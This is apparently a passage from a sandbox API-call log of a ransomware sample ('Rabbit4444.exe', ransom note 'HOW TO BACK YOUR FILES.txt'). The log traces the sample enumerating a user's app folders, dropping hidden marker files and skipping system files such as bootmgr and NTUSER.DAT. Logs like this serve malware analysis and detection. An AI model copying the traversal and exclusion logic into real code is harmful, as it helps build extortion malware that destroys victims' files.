returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0066.654] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.658] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.660] FlushFileBuffers (hFile=0x228) returned 1 [0066.661] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.662] CloseHandle (hObject=0x228) returned 1 [0066.662] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy") returned 91 [0066.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.662] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf10e3233, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.662] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.662] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.662] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.662] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.662] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf10e3233, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.662] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.662] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.662] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.662] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.663] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.663] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf10e3233, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf10e3233, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf10e3233, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.663] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.663] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.663] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7544fabf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0066.663] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.663] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.663] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0066.663] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0066.663] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0066.663] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0066.663] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0066.663] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0066.663] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0066.663] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0066.663] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0066.663] lstrcpyW (in: lpString1=0x130ebf0, lpString2="AC" | out: lpString1="AC") returned="AC" [0066.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0066.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0xefb28 [0066.663] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221e8 | out: ListHead=0xf68b0, ListEntry=0x1221e8) returned 0x11ce48 [0066.663] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75403601, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0066.663] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0066.663] lstrcpyW (in: lpString1=0x130ebf0, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0066.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0066.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x115f70 [0066.664] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x1221e8 [0066.664] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75403601, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0066.664] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0066.664] lstrcpyW (in: lpString1=0x130ebf0, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0066.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0066.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108838 [0066.664] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122308 [0066.664] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75403601, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0066.664] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0066.664] lstrcpyW (in: lpString1=0x130ebf0, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0066.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0066.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108760 [0066.664] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x122248 [0066.664] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75403601, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0066.665] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0066.665] lstrcpyW (in: lpString1=0x130ebf0, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0066.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0066.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11bb28 [0066.665] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122368 [0066.665] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75403601, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0066.665] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0066.665] lstrcpyW (in: lpString1=0x130ebf0, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0066.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0066.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xca) returned 0x108688 [0066.665] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x1222c8 [0066.665] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75403601, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0066.665] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.665] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.666] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0066.666] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0066.666] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0066.666] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0066.666] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0066.666] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0066.666] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0066.666] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0066.666] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0066.666] lstrcpyW (in: lpString1=0x130ebf0, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0066.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0066.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11b508 [0066.666] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x121fe8 [0066.666] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75403601, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0066.666] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0066.666] lstrcpyW (in: lpString1=0x130ebf0, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0066.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0066.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108250 [0066.666] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122268 [0066.666] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75403601, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0066.666] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.667] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.667] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.667] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.667] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.668] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.668] CloseHandle (hObject=0x27c) returned 1 [0066.668] CloseHandle (hObject=0x228) returned 1 [0066.668] GetCurrentThreadId () returned 0xd98 [0066.668] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0066.668] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState" [0066.668] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108250 | out: hHeap=0xe0000) returned 1 [0066.668] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0066.668] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState" [0066.668] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState\\" [0066.668] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0066.668] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.670] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.673] FlushFileBuffers (hFile=0x228) returned 1 [0066.673] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.674] CloseHandle (hObject=0x228) returned 1 [0066.674] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState") returned 101 [0066.674] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.674] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1105f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0066.674] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.674] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.674] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.674] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.674] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1105f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.675] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.675] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.675] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.675] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.675] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.675] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1105f0f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1105f0f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1105f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, 